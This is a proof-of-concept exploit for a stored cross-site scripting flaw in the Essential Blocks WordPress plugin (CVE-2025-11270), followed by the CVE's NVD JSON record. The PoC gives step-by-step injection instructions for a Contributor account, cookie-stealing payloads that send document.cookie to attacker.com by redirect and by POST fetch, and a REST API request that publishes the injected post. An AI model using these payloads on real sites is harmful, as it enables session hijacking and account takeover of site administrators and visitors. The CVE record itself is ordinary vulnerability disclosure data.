CVE-2025-11270

<!-- CVE-2025-11270 PoC - Stored XSS via 'titleTag' attribute in Essential Blocks plugin Vulnerability: Insufficient input sanitization and output escaping on 'titleTag' attribute Required privilege: Contributor-level or above --> <!-- Step 1: As a Contributor, create or edit a post/page using Essential Blocks --> <!-- Step 2: Insert a WooCommerce Title block --> <!-- Step 3: In the 'titleTag' attribute, inject the following malicious payload --> <!-- Payload for the titleTag attribute (injected via block editor or REST API): --> "><script>alert('XSS-CVE-2025-11270');document.location='https://attacker.com/steal?cookie='+document.cookie;</script> <!-- Alternative payload using event handler: --> <!-- " onerror="alert('XSS');fetch('https://attacker.com/steal',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:location.href})}) --> <!-- Step 4: Publish/Submit the post for review --> <!-- Step 5: When any user (including admin) views the published page, the script executes --> <!-- Example via WordPress REST API: --> /* POST /wp-json/wp/v2/posts HTTP/1.1 Content-Type: application/json Cookie: [authenticated_contributor_session] { "title": "Test Post", "content": "<!-- wp:essential-blocks/woocommerce-title {\"titleTag\":\"\"><script>alert('XSS')</script>\"} /-->", "status": "publish" } */

{"cve": {"id": "CVE-2025-11270", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:34.687", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'titleTag' attribute in all versions up to, and including, 5.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3376903/essential-blocks/trunk/views/woocommerce/title.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aace327b-7091-48e2-9e02-ec48a08b129b?source=cve", "source": "[email protected]"}]}}